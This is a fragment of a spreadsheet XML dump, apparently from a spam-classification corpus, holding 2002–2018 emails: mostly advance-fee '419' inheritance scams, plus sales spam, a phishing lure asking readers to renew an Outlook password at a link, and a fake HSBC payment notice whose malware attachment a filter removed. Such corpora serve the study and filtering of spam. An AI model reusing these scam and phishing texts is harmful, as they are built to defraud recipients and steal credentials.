    <t>Thu, 23 Nov 2006 15:16:24 +0000</t>
  </si>
  <si>
    <t>woma lee &lt;woma_lee_3@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM DR WOMA LEE/URGENT NEEDED AND CONFIDENTIAL</t>
  </si>
  <si>
    <t>FROM DR. WOMA LEE THE MANAGER FOREIGN REMITTANCE\nDEPARTMENT,\nAFRICA DEVELOPMENT BANK(ADB)\nBURKINA FASO.\n\nDear Partner,\n\n(TOP SECRET)\n\nI am DR WOMA LEE, the manager in charge of\nauditing and accounting\nsection of Africa Development Bank.AFRICA\nDEVELOPMENT BANK(ADB) Ouagadougou\nBurkina-faso West Africa ,with due respect and\nregard. I have decided to\ncontact you on a business transaction that will be\nvery beneficial to both\nof us at the end of the transaction .\n\nDuring our investigation and auditing in this bank,\nmy department came\nacross a very huge sum of money belonging to a\ndeceased person Mr.Andreas\nSchranner who who died with his wife and their only\ndaughter on July 2000 in\na plane crash and the fund has been dormant in his\naccount with this Bank\nwithout any claim of the fund in our custody either\nfrom his family or\nrelation before our discovery to this development.\n\nThe said amount was U.S $10.150M ((Ten million one\nhundred and fiftythousand\nUS dolloars)). As it may interest you to know, I got\nyour impressive\ninformation through internation search in\nBurkina-faso here in Ouagadougou\nBurkina-faso.\n\nMeanwhile all the whole arrangement to put claim\nover this fund as the\nbonafide next of kin to the deceased, get the\nrequired approval and transfer\nthis money to a foreign account has been put in\nplace and directives and\nneeded information will be relayed to you as soon as\nyou indicate your\ninterest and willingness to assist me and also\nbenefit your self to this\ngreat business opportunity.\n\nIn fact I could have done this deal alone but\nbecause of my position in this\ncountry as a civil servant(A Banker),we are not\nallowed to operate a foreign\naccount and would eventually raise an eye brow on my\nside during the time of\ntransfer because I work in this bank. This is the\nactual reason why it will\nrequire a second party or fellow who will forward\nclaims as the next of kin\nwith affidavit of trust of oath to the Bank and also\npresent a foreign\naccount where he will need the money to be\nre-transferred into on his\nrequest as it may be after due verification and\nclarification by the\ncorrespondent branch of the bank where the whole\nmoney will be remitted from\nto your own designation bank account.\n\nI will not fail to inform you that this transaction\nis 100% risk free. On\nsmooth conclusion of this transaction, you will be\nentitled to 40% of the\ntotal sum as gratification, while 60% will be for\nme. Please, you have been\nadviced to keep "top secret" as I am still in\nservice and intend to retire\nfrom service after we conclude this deal with you.\n\nI will be monitoraing the whole situation here in\nthis bank until you\nconfirm the money in your account and ask me to come\ndown to your country\nfor subsequent sharing of the fund according to\npercentages previously\nindicated and further investment, either in your\ncountry or any country you\nadvice us to invest in. All other necessary\ninformation will be sent to you\nwhen I hear from you.\nTrusting to hear from you. you can contact me\nthrough this number(226\n76440063).\n\nYou can visit the sit\n[URL]http://news.bbc.co.uk[/URL]\n\n\nYours faithfully,\nDR. WOMA LEE.\n\n_________________________________________________________________\nFREE pop-up blocking with the new MSN Toolbar - get it now! \n[URL]http://toolbar.msn.click-url.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://toolbar.msn.click-url.com</t>
  </si>
  <si>
    <t>2730</t>
  </si>
  <si>
    <t>To: nan\nFrom: samuel_ petters08 &lt;samuel_petters08@hotmail.com&gt;\nDate: Thu, 23 Nov 2006 15:11:52 +0000</t>
  </si>
  <si>
    <t>Thu, 23 Nov 2006 15:11:52 +0000</t>
  </si>
  <si>
    <t>samuel_ petters08 &lt;samuel_petters08@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Mr.SAMUEL PETTERS</t>
  </si>
  <si>
    <t>Mr.SAMUEL PETTERS\nBOA Bank of Africa\n\nBurkina Faso in West Africa\n\n\n\nDear Friend,\n\n\n\nI am Mr.SAMUEL PETTERS\n\nThe Furring Remittance Director of BOA\n\nBank of Africa.\n\n.\n\n\n\n\n\nI have urgent and very confidential business proposal for you. On September\n\n4, 2001, Mr Werner Karl Ruddigkeit, a National of German, who used to be a\n\nPrivate contractor with the Shell Petroleum Development Company in Saudi \nArabia Mr. Werner Karl Ruddigkeit Made a numbered time (Fixed deposit) for \n36\n\nCalendar months, valued at GBP30,000,000.00 (Thirty Million Pounds only) in\n\nMy branch.\n\n\n\nUpon maturity in 2004, I sent a routine notification to his forwarding\n\nAddress but got no reply. After a month, we sent a reminder and finally we\n\nDiscovered from his contract employers, Shell Petroleum Development Company \nin\n\nSaudi Arabia that Mr. Werner Karl Ruddigkeit and his wife with their three\n\nChildren were involved in an auto crash, all occupants\n\nOf the vehicle unfortunately lost their lives.\n\n\n\nOn further investigation, I found out that he died without making a WILL, \nand\n\nAll attempts to trace his next of kin were fruitless. I therefore made \nfurther\n\nInvestigation and discovered that Mr. Werner Karl Ruddigkeit. Did not \ndeclare\n\nAny next of kin or relations in all his official documents, including his \nBank\n\nDeposit paperwork in my Bank. This sum of GBP30.000, 000.00 have been\n\nFloating as unclaimed\n\nSince 2001 in my bank as all efforts to get his relatives have hit the \nstones.\n\nAccording to the Burkina Faso law at the expiration of 5 FIVE) years, the \nMoney will\n\nRevert to the ownership of the Burkina Faso Government if nobody applies to \nclaim\n\nThe fund and the FIVE years is the end of DECEMBER 2006.\n\n\n\nSince I have been unsuccessful in locating the relatives for over 2 years \nnow,\n\nI seek your consent to present you as the next of kin / Will Beneficiary to\n\nThe deceased so that the proceeds of this account valued at \nGBP30,000,000.00\n\nCan be paid to you. This will be disbursed or shared in these percentages, \n60%\n\nTo me and 40% to you.\n\n\n\nI have all necessary legal documents that can be used to back up any claim \nwe\n\nMay make. All I require is your honest Co-operation, Confidentiality and \nTrust\n\nTo enable us see this transaction through. I guarantee you that this will be\n\nExecuted under a legitimate arrangement that will protect you from any \nbreach\n\nOf the law. Please, provide me with the following;\n\n\n\n1. Full Name\n\n2. Your Telephone Number and Fax Number\n\n3. Your Contact Address\n\n4. Age\n\n\n\nYour urgent response will be highly anticipated and appreciated.\n\n\n\nBest regards,\n\n\n\nMr. SAMUEL PETTERS\n\n\n\nTEL/+226 76 01 53 98\n\n_________________________________________________________________\nMSN Messenger : discutez en direct avec vos amis ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2728</t>
  </si>
  <si>
    <t>To: info@fx-time.ru\nFrom: nan\nDate: Thu, 23 Nov 2006 13:46:05 +0800</t>
  </si>
  <si>
    <t>Thu, 23 Nov 2006 13:46:05 +0800</t>
  </si>
  <si>
    <t>info@fx-time.ru</t>
  </si>
  <si>
    <t>URGENT REPLY.</t>
  </si>
  <si>
    <t>http://freemail5.eyou.com http://sms.eyou.com</t>
  </si>
  <si>
    <t>4949</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "Senior Selling" &lt;gsl@insurancemail.net&gt;\nDate: Thu, 23 May 2002 19:39:13 -0400</t>
  </si>
  <si>
    <t>Thu, 23 May 2002 19:39:13 -0400</t>
  </si>
  <si>
    <t>"Senior Selling" &lt;gsl@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Roth conversions = jumbo annuity sale</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_268694_01C20276.CCE3E8C0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  What good is a great concept (Roth conversion) without a turnkey system to sell it?	  	 Introducing the Roth Conversion turnkey selling system Our top producing roth conversion agent (sold 10 jumbo annuities, 200k sales with 14%+ commissions) has shared with us his secrets of selling the roth conversion concept. Per his input, we have created the roth conversion "turnkey sales process". The system includes client postcards, client brochures, a client worksheet (perfect for introducing the roth conversion program), a full marketing presentation, etc. If he can do it, so can you! To join us for the brand new "sales presentation" teleconference, call in Monday, Wednesday or Friday at 12:00 noon Pacific/3 p.m. Eastern at:  702-579-4902 To find out more about the content of the call complete the form below and you will be immediately directed to the "conference call" page.    First Name:	  	 	 Last Name:	  	Note that when you press the "Send Information" button the screen may not change, but we will still receive your information and get back to you. Another way to order our sample presentation is to visit our website at [URL]www.gsladvisory.com[/URL]  .	  E-Mail:	  	 Phone#:	  	       GSL Advisory These materials are for "agent use only". You should be a practicing, licensed and appointed annuity agent to order this information. We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_268694_01C20276.CCE3E8C0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Roth conversions =3D jumbo annuity sales =20      =20      =20     =20       =20         Introducing the Roth Conversion turnkey = selling system Our top producing roth conversion agent (sold 10 jumbo = annuities,=20         200k sales with 14%+ commissions) has shared with us his = secrets of=20         selling the roth conversion concept. Per his input, we have = created the=20         roth conversion "turnkey sales process". The system includes client postcards, client brochures, a = client worksheet=20         (perfect for introducing the roth conversion program), a full = marketing=20         presentation, etc. If he can do it, so can you! To join us for the brand new "sales = presentation"=20         teleconference, call in Monday, Wednesday or Friday at 12:00 = noon Pacific/3=20         p.m. Eastern at: =20        =20            To find out more about the content of the call complete the form = below       and you will be immediately directed to the "conference = call" page.        =20                   First Name: =20                      =20                      =20                   Last Name: =20                      Note that=20                     when you press the "Send Information" = button the=20                     screen may not change, but we will still receive = your information=20                     and get back to you. Another way to order our sample = presentation=20                     is to visit our website at [URL]www.gsladvisory.com[/URL]&lt;= /font&gt; =20                   E-Mail: =20                      =20                   Phone#: =20                                    =20      These materials are for "agent use only".  You should be a = practicing, licensed  and appointed annuity agent to order this = information.  =20     =20        We = don't want anyone=20         to receive our mailings who does not wish to. This is = professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: =20         [URL]http://www.Insurancemail.net[/URL] Legal Notice=20 ------=_NextPart_000_268694_01C20276.CCE3E8C0--</t>
  </si>
  <si>
    <t>4944</t>
  </si>
  <si>
    <t>To: yyyy-cv@spamassassin.taint.org\nFrom: Elizibeth Bradley &lt;elizibeth-bradley@allexecs.org&gt;\nDate: Thu, 23 May 2002 10:45:11 +0800</t>
  </si>
  <si>
    <t>Thu, 23 May 2002 10:45:11 +0800</t>
  </si>
  <si>
    <t>Elizibeth Bradley &lt;elizibeth-bradley@allexecs.org&gt;</t>
  </si>
  <si>
    <t>Saw your resume. . . .</t>
  </si>
  <si>
    <t>Hi There,\n\nI recently came across a copy of your resume I found on the \ninternet. In case you're back on the market, you should check\nout this new web service that instantly posts your resume to\nover 75 career websites.\n\nYou fill out one online form and immediately you can be seen\nby over 1.5 million employers and recruiters daily! It works.\n\nIn about 15 minutes you'll be posted to all the major sites\nlike: Monster, CareerBuilder, HotJobs, Dice, Job.com and\nmore. It'll save you 60 hours in research and data entry.\n\nCheck out [URL]http://start.resumerabbit.com[/URL] - I think you'll\nlike it. You don't even need a current resume.\n\nIt's a tough job market right now. So if you've got a good\njob hold on to it. But these days it's smart to have a few\nirons in the fire too. That only happens by being in all the\nright places at all the right times. So even if you do it by\nhand, get maximum exposure and be found on as many career\nsites as possible.\n\nJust food for thought!\n\nBest Wishes,\n\nElizabeth Bradley\nManager\nelizibeth-bradley@allexecs.org\n\n\n\n========================================================\n\nThe staff of AllExecs.org have years of recruiting\nexperience and may from time to time send you a\nreview of a career tool that has helped others in their\njob search.  If you'd rather not receive these reviews,\nreply to this note with "Remove" in the subject line.\n\n========================================================</t>
  </si>
  <si>
    <t>http://start.resumerabbit.com</t>
  </si>
  <si>
    <t>4947</t>
  </si>
  <si>
    <t>To: dcarlson@ontogenics.com\nFrom: investmentalert@freenet.co.uk\nDate: Thu, 23 May 2002 08:40:37 -0700</t>
  </si>
  <si>
    <t>Thu, 23 May 2002 08:40:37 -0700</t>
  </si>
  <si>
    <t>investmentalert@freenet.co.uk</t>
  </si>
  <si>
    <t>dcarlson@ontogenics.com</t>
  </si>
  <si>
    <t>3D Motion Capture</t>
  </si>
  <si>
    <t>![]([URL]http://www.%74%65r%52%61.es[/URL] |\n![]([URL]http://www.%74%65r%52%61.es[/URL] |\n![]([URL]http://www.%74%65r%52%61.es[/URL] |\n![]([URL]http://www.%74%65r%52%61.es[/URL]  \n---|---|---|---  \n![]([URL]http://www.%74%65r%52%61.es[/URL]\nGuy_r1_c1.gif) |\n![]([URL]http://www.%74%65r%52%61.es[/URL]  \n![]([URL]http://www.%74%65r%52%61.es[/URL]\nGuy_r2_c1.gif) |\n![]([URL]http://www.%74%65r%52%61.es[/URL]\nGuy_r2_c2.gif) |\n![]([URL]http://www.%74%65r%52%61.es[/URL]\nGuy_r2_c3.gif) |\n![]([URL]http://www.%74%65r%52%61.es[/URL]  \n![]([URL]http://www.%74%65r%52%61.es[/URL]\nGuy_r3_c2.gif) |\n![]([URL]http://www.%74%65r%52%61.es[/URL]  \n  \n\n\n\n\nTo UNSUBSCRIBE simply REPLY to this email with REMOVE in the SUBJECT LINE\n\n</t>
  </si>
  <si>
    <t>http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es http://www.%74%65r%52%61.es</t>
  </si>
  <si>
    <t>1369</t>
  </si>
  <si>
    <t>To: avingg001@eresmas.com\nFrom: Ade William &lt;avingg001@eresmas.com&gt;\nDate: Thu, 23 Jun 2005 11:07:42 +0000</t>
  </si>
  <si>
    <t>Thu, 23 Jun 2005 11:07:42 +0000</t>
  </si>
  <si>
    <t>Ade William &lt;avingg001@eresmas.com&gt;</t>
  </si>
  <si>
    <t>avingg001@eresmas.com</t>
  </si>
  <si>
    <t>FROM ADE WILLIAMS</t>
  </si>
  <si>
    <t>ADEWILLIAMS &amp; ASSOCIATES117 ADE ROAD LAGOS NIGERIA.TEL: 234 1 759781  Dear Sir,  I am Barrister Ade Williams, a legal Solicitor and I wasthe Personal Attorney and legal adviser to MR.John Bales ,a national of your country, who used to work with Mobil oilCompany Nigeria Plc. On the 21st of August 2000, myclient,his wife and their three children were involved in acar accident along Sagamu Express Road. All occupants ofthe vehicle unfortunately lost their lives. Since then Ihave made several enquiries to your embassy to locate anyof my clients extended relatives, this has also provedunsuccessful.After these several unsuccessful attempts, Idecided to trace his relatives over the Internet, to locateany member of his family but of no avail, hence I contactedyou. I have contacted you to assist in repatriating the moneyand property left behind by my client before they getconfiscated or declared unserviceable by the bank wherethese huge deposits were lodged. Particularly, the bankwhere the deceased had a deposit valued at about TenMillion United States Dollars($U.S10,000,000) has issued mea notice to provide the next of kin or have the accountconfiscated within the next ten official working days.Since I have been unsuccessful in locating the relativesfor over two years now. I seek your consent to present you as the next of kin ofthe deceased Since you are from the same country so thatthe proceeds of this account valued at Ten Million UnitedStates Dollars ($U.S10,000,000) can be paid to you and thenyou and me can share the money. 65% to me and 25% toyou,while 10% should be for expenses or tax as yourGovernment may require, I have all necessary legaldocuments that can be used to back up any claim we maymake. All I require is your honest Cooperation to enable ussee this deal through. I guarantee that this will beexecuted under a legitimate arrangement that will protectyou from any breach of the law.  Best regards, Barrister Ade WilliamsKINDLY CALL ME FOR ORAL CLERIFICATION.+234 1 759781  ORREPLY TO avingg@hotmail.com-----------------------------------------------------------------------Encuentra tu casa rápida y cómodamente. Miles de viviendas te están esperando en [URL]http://www.portae.com[/URL]</t>
  </si>
  <si>
    <t>http://www.portae.com</t>
  </si>
  <si>
    <t>832</t>
  </si>
  <si>
    <t>To: nan\nFrom: Renee Ahern &lt;rahern@njea.org&gt;\nDate: Thu, 23 Aug 2018 14:32:46 +0000</t>
  </si>
  <si>
    <t>Thu, 23 Aug 2018 14:32:46 +0000</t>
  </si>
  <si>
    <t>Renee Ahern &lt;rahern@njea.org&gt;</t>
  </si>
  <si>
    <t>Microsoft Outlook</t>
  </si>
  <si>
    <t>Your Microsoft Outlook Password will expire today. You are to click on this link [URL]http://site9423341.92.webydo.com[/URL]  immediately and fill the form correctly and submit for immediate validation.\n\n</t>
  </si>
  <si>
    <t>http://site9423341.92.webydo.com</t>
  </si>
  <si>
    <t>833</t>
  </si>
  <si>
    <t>To: Recipients &lt;noreply@angel-kai.net&gt;\nFrom: "HSBC Bank (Hong Kong)" &lt;noreply@angel-kai.net&gt;\nDate: Thu, 23 Aug 2018 11:59:18 -0500</t>
  </si>
  <si>
    <t>Thu, 23 Aug 2018 11:59:18 -0500</t>
  </si>
  <si>
    <t>"HSBC Bank (Hong Kong)" &lt;noreply@angel-kai.net&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;noreply@angel-kai.net&gt;</t>
  </si>
  <si>
    <t>[VIRUS] Bank Transfer Notification</t>
  </si>
  <si>
    <t>The attached message from "HSBC Bank (Hong Kong)"  was found to contain the virus "Sanesecurity.Malware.27342.RarHeur.v5.HideExt.UNOFFICIAL(38a6f96d9f98dcd7e5b3737d2d975b05:655594)". The infected portion of the message was removed by Virus Blocker. Good day, Our Ref: MIDLGB31. Find enclosed payment proof made to your company account on behalf of our client to your receiving bank dated 23/08/2018. Kindly confirm payment and client Ref details from attached swift Copy and advice accordingly. Thanks and regards,    -- David Wong Funds Transfer Dept.,  Business Banking, Eastern District, Commercial Banking The Hongkong and Shanghai Banking Corporation Limited (HSBC) 14/F, Causeway Bay Plaza Two, 463-483 Lockhart Road,  Causeway Bay, Hong Kong. Email: customerservice@hsbc.com.hk web: [URL]https://www.hsbc.com.hk[/URL]     ****************************** ****************************** ******* This e-mail is confidential. It may also be legally privileged. If you are not the addressee you may not copy, forward, disclose or use any part of it. If you have received this message in error, please delete it and all copies from your system and notify the sender immediately by return e-mail. Internet communications cannot be guaranteed to be timely, secure, error or virus-free. The sender does not accept liability for any errors or omissions. ****************************** ****************************** ******* "SAVE PAPER - THINK BEFORE YOU PRINT!" Good day,Our Ref: MIDLGB31.Find enclosed payment proof made to your company account on behalf of our client to your receiving bank dated 23/08/2018.Kindly confirm payment and client Ref details from attached swift Copy and advice accordingly.Thanks and regards,  --David WongFunds Transfer Dept., Business Banking, Eastern District, Commercial BankingThe Hongkong and Shanghai Banking Corporation Limited (HSBC)14/F, Causeway Bay Plaza Two, 463-483 Lockhart Road, Causeway Bay, Hong Kong.Email: customerservice@hsbc.com.hkweb: [URL]https://www.hsbc.com.hk[/URL]  ****************************** ****************************** *******This e-mail is confidential. It may also be legally privileged.If you are not the addressee you may not copy, forward, discloseor use any part of it. If you have received this message in error,please delete it and all copies from your system and notify thesender immediately by return e-mail.Internet communications cannot be guaranteed to be timely,secure, error or virus-free. The sender does not accept liabilityfor any errors or omissions.****************************** ****************************** *******"SAVE PAPER - THINK BEFORE YOU PRINT!"</t>
  </si>
  <si>
    <t>https://www.hsbc.com.hk https://www.hsbc.com.hk</t>
  </si>
  <si>
    <t>3293</t>
  </si>
  <si>
    <t>To: nan\nFrom: HARRISON FELISSA &lt;felissajen115@hotmail.fr&gt;\nDate: Thu, 23 Aug 2007 10:07:27 -0400</t>
  </si>
  <si>
    <t>Thu, 23 Aug 2007 10:07:27 -0400</t>
  </si>
  <si>
    <t>HARRISON FELISSA &lt;felissajen115@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>FROM: MISS FELISSA JENNY HARRISON</t>
  </si>
  <si>
    <t>\nFROM: MISS FELISSA JENNY HARRISONABIDJAN COTE D'IVOIRE ADDRESS: BELLA HOUSE 12 BP ABIDJAN 037 BELVIEW CLOSS. PLS CONTACT ME AT  (felissajan@yahoo.com)  DEAR GOOD FRIEND. \nI GOT YOUR CONTACT DETAILS IN MY INTERNET RESEARCH FOR WEB SITES. I GOT ABOUT THREE E-MAIL CONTACT AND I DECIDED TO CONTACT YOU AFTER MY SAVEN DAYS PRAYER AND FASTING, HOPING THAT BY GRACE OF ALMIGHTY GOD YOU WILL KINDLY ASSIST ME OUT. I AM SEEKING FOR AN OVERSEA'S GUARDANCE WHO WILL ASSIST ME FOR URGENT FUNDS TRANSFER.  I AM FELISSA JENNY HARRISON 21 YEARS OLD THE ONLY DAUGHTER OF LATE CHIEF ROLAND LEO HARRISON WHO WAS A GOLD FAMOUS AND WEALTHY COCOA MERCHANT BASED IN ABIDJAN THE ECONOMIC CAPITAL OF IVORY COAST. I AM SEEKING FOR YOUR URGENT ATTENTION TO ASSIST ME TRANSFER THE SUM OF US$12,500,000.00 TWELVE MILLION FIVE HUNDRED THOUSAND UNITED STATE DOLLARS INTO YOUR NOMINATED BANK ACCOUNT OVERSEAS FOR AN INVESTMENTS PURPOSES,SUCH AS REAL ESTATES MANAGEMENTS OR STOCK MARKERTS INVESTMENT. E.T.C  I AM WILLING TO OFFER YOU 17% OF THE TOTAL FUNDS AS A COMMISSION FOR YOUR URGENT ASSISTANCE IN TRANSFERING THIS FUNDS INTO YOUR BANK ACCOUNT AND I WILL COME OVER TO YOUR COUNTRY TO CONTINUE MY EDUCATION. PLEASE KINDLY E-MAIL ME IMMEDIATELY YOU RECEIVE THIS MY MESSAGE FOR MORE DETAILS CONCERNING THIS MY MUTUAL TRANSACTION BECAUSE WANT TO COME AND STAY WITH YOU FOR THE REST OF MY LIFE AFTER THE SUCCESSFULL TRANSFER OF MY FUNDS INTO YOUR BANK ACCOUNT. I AM LODGING IN A LOCAL HOTEL FOR MY SECURITY. \n \nI WILL SEND YOU THE FULL DETAILS AND PROCEEDURE OF THIS TRANSFER TO YOUR BANK ACCOUNT.PLEASE QUICKLY REPLY ME BACK WITH THIS MY PRIVATE EMAIL ADDRESS (felissajan@yahoo.com) FOR SECRET AND CONFIDENTIAL AND WILL ALSO MAIL YOU MY PHOTOS OK.I AM WAITING FOR YOUR URGENT AND KIND REPLY AFTER READING THIS MAIL.  THANKS AND GOD BLESS YOU AS YOU REPLY IMMEDIATELY. \nBEST REGARDS \nFELISSA JENNY HARRISON\n_________________________________________________________________\nAppelez vos amis de PC à PC -- C'EST GRATUIT\n[URL]http://get.live.com[/URL]</t>
  </si>
  <si>
    <t>http://get.live.com</t>
  </si>
  <si>
    <t>1494</t>
  </si>
  <si>
    <t>To: nan\nFrom: FROM AHMED TANkOH &lt;ahmedtankoh100@yahoo.com&gt;\nDate: Thu, 22 Sep 2005 21:34:53 +0000</t>
  </si>
  <si>
    <t>Thu, 22 Sep 2005 21:34:53 +0000</t>
  </si>
  <si>
    <t>FROM AHMED TANkOH &lt;ahmedtankoh100@yahoo.com&gt;</t>
  </si>
  <si>
    <t>GOOD NEWS</t>
  </si>
  <si>
    <t xml:space="preserve"> \n\n \n\nGreeting,\nSir,\nI am contacting you believing you are a honest and trustworthy person.I believe you will not betray the confidence I am willing to repose in you, for me to have contacted you even though we've not met before.\nMy name is Ahmed Tankoh,the only son of late Mr.Hassan Tankoh who was the chairman /President/CEO,Cacao-Cafe &amp; Agro-Alimentary industries plc.SCAFECAO)"Bouake" and ex-owner of Polyclinic LA-MADONNE, of the Republic of Cote d'Ivoire.\nYou can find the story on this website:[URL]http://news.bbc.co.uk[/URL]\nOn 19th of September 2002,a group of so called rebels took over the city of Bouake to over-throw the Government of Mr.Laurent Gbagbo the President of Cote d'Ivoire. On the 20th day morning at about 4:18am some fractions of the same group of rebels break into our house and killed our security guard and pass-through the gate entrance to the main building and took my father away to an un-known destination.\nAfter about four hours later we found him (my father) at the road side, by then he had been totally beaten and was bleeding to death lying in the pool of his own blood. From there, we rushed him to a near by hospital and hours later he sent for my mother. So he told her that he can not make it from the doctors diagnosis, he also told her that it was because he (my father) was not from the northern part of the country that he has been treated this way and also being a political activist. And again he said he is suspecting some of his business partners for conspiracy and this sort of brutality. He also told my mother that he deposited a huge amount of money i.e US$ 10.5million dollars(Ten million five hundred thousand us dollars only) into a Bank in the Capital city of Dakar Senegal he also told my mother where he kept the whole documents concerning this deposit that is made for investment purpose in the western world.\nThat same day, he (my father) gave up the ghost. Then with the help of the French soldiers, we escaped to Senegal, where we are now. I am now contacting you believing you are honest and trustworthy to help us to receive the money in your account for investment, I and my mother has decided in compensating you 30%of the total amount for your assistance .\nPlease do take your time to go through the mail and get back to us, so that I will simply introduce you to the Bank where the fund are being kept now for onward transfer. So you can contact me through my alternate email adress for security reason.\nEmail ahmedtankoh200@yahoo.comI am waiting for your response.\nThanks and God bless.\nAhmed Tankoh .\n \n \n \n  \n\n\n\n\n</t>
  </si>
  <si>
    <t>193</t>
  </si>
  <si>
    <t>To: smg@aber.ac.uk\nFrom: saidi fatou &lt;saidifatou@moldova.com&gt;\nDate: Thu, 22 May 2003 04:16:27 -0700</t>
  </si>
  <si>
    <t>Thu, 22 May 2003 04:16:27 -0700</t>
  </si>
  <si>
    <t>saidi fatou &lt;saidifatou@moldova.com&gt;</t>
  </si>
  <si>
    <t>smg@aber.ac.uk</t>
  </si>
  <si>
    <t>HELP SERVE HUMANITY</t>
  </si>
  <si>
    <t>Dear Friend.\n\n As you read this, I don't want you to feel sorry for\n me, because, I believe everyone will die someday.\n\n My name is Saidi Fatou, a merchant in Dubai, in the\n U.A.E.I have been diagnosed with Esophageal cancer\n which was discovered very late, due to my laxity in\ncarrying for my health. It has defiled all forms of\n medicine, and right now I have only about a few\n months to live, according to medical experts.\n\n I have not particularly lived my life so well, as I\n never really cared for anyone not even myself but my\n business. Though I am very rich, I was never\n generous, I was always hostile to people and only\n focus on my business as that was the only thing I\ncared for. But now I regret all this as I now know\nthat there is more to life than just wanting to have\n or make all the money in the world.\nI believe when God gives me a second chance to come\n to this world I would live my life a different way\n from how I have lived it. Now that God ! has called\n me, I have willed and given most of my properties\n and assets to my immediate and extended family\n members and as well as a few close friends.\n I want God to be merciful to me and accept my soul\n and so, I have decided to give alms to charity\n organizations, as I want this to be one of the last\n good deeds I do on earth. So far, I have distributed\n money to some charity organizations in the U.A.E,\n Algeria and Malaysia. Now that my health has\n deteriorated so badly, I cannot do this my self any\n more. I once asked members of my family to close one\n of my accounts and distribute the money which I have\n there to charity organization in Bulgaria and\n Pakistan, they refused and kept the money to\n themselves. Hence, I do not trust them anymore, as\n they seem not to be contended with what I have left\n for them.\n The last of my money which no one knows of is the\n huge cash deposit of twenty four million dollars\n that I have with a Bank in london.\n I will want you to help me collect this deposit and\ndispatched it to charity organizations.email me\n at giversworld@fastermail.com\n I have set aside 10% for you for your time and\n patience.\n\nGod be with you.\n\n Saidi Fatou.\n\n\n_____________________________________________________________\nGet free email address your_name@moldova.com at\n[URL]http://www.moldova.com[/URL]\n\nYour Gateway to Moldova!\n\n_____________________________________________________________\nSelect your own custom email address for FREE! Get you@yourchoice.com w/No Ads, 6MB, POP &amp; more! [URL]http://www.everyone.net[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.moldova.com http://www.everyone.net</t>
  </si>
  <si>
    <t>2984</t>
  </si>
  <si>
    <t>To: nan\nFrom: mark akima &lt;markakima023@hotmail.fr&gt;\nDate: Thu, 22 Mar 2007 04:10:06 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2007 04:10:06 +0100</t>
  </si>
  <si>
    <t>mark akima &lt;markakima023@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>PLEASE VERY IMPORTANT.</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR MARK AKIMA.\nBILL AND EXCHANGE MANAGER,\nBANK OF AFRICA (B.O.A).\nOUAGADOUGOU, BURKINA FASO WEST AFRICA.\nPHONE CONTACT 00226.78.89.77.34.\n\nDEAR FRIEND,\n\nI AM THE MANAGER OF BILL AND EXCHANGE DEPARTMENT  BANK OF AFRICA (B.O.A)IN \nMY DEPARTMENT I DISCOVERED AN ABANDONED SUM FF ($31.500.000 U.S) THIRTY ONE \nMILLION FIVE HUNDRED THOUSANDS US DOLLARS). IN AN ACCOUNT THAT BELONGS TO \nONE OF OUR FOREIGN CUSTOMER WHO DIED ALONG WITH HIS ENTIRE FAMILY ON 25TH \nJULY, 2000 CONCORDE PLANE CRASH [FLIGHT AF4590] WITH THE WHOLE PASSENGERS \nABOARD.\n\nON 25TH JULY, 2000 CONCORDE PLANE CRASH [FLIGHT AF4590] WITH THE WHOLE \nPASSENGERS ABOARD. THE NAME OF THE DECEASED MAN WAS\n\n(MR.ANDREAS SCHRANNER FROM MUNICH GERMANY)\nN.B. IN OTHER FOR YOU TO BELIEVE ME HONESTLY, VISIT THE WEB SITE TO ENABLE \nYOU KNOW WHETHER WE CAN WORK TOGETHER, BELOW IS THE WEBSITE.\n\n      [URL]http://news.bbc.co.uk[/URL]\n\nSINCE WE GOT INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF \nKIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CAN NOT RELEASE IT UNLESS \nSOMEBODY APPLIES FOR IT AS NEXT OF KIN OR RELATION TO THE DECEASED AS \nINDICATED IN OUR BANKING GUIDELINES BUT UNFORTUNATELY WE IEARNT THAT ALL HIS \nSUPPOSED NEXT OF KIN OR RELATION DIED ALONGSIDE WITH HIM AT THE PLANE CRASH \nIEAVING NOBODY BEHIND FOR THE CLAIM.\n\nIT IS THEREFORE UPON THIS DISCOVERY THAT I NOW DECIDED TO MAKE THIS \nBUSINNESS PROPOSAL TO YOU AND RELEASE THE MONEY TO YOU AS THE NEXT OF KIN OR \nRELATION TO THE DECEASED FOR SAFETY AND SUBSEQUENT DISBURSEMENT SINCE NOBODY \nIS COMING FOR IT AND I DONT WANT THIS MONEY TO GO INTO THE BANK TREASURY AS \nUNCLAIMED BILL.\n\nTHE BANKING LAW AND GUIDELINE HERE STIPULATES THAT IF SUCH MONEY REMAINED \nUNCLAMED AFTER FIVE YEARS, THE MONEY WILL BE TRANSFERED INTO THE BANK \nTREASURY AS UNCLAIMED FUND.THE REQUEST OF FOREIGNER AS NEXT OF KIN IN THIS \nBUSINESS IS OCCASIONED BY THE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A 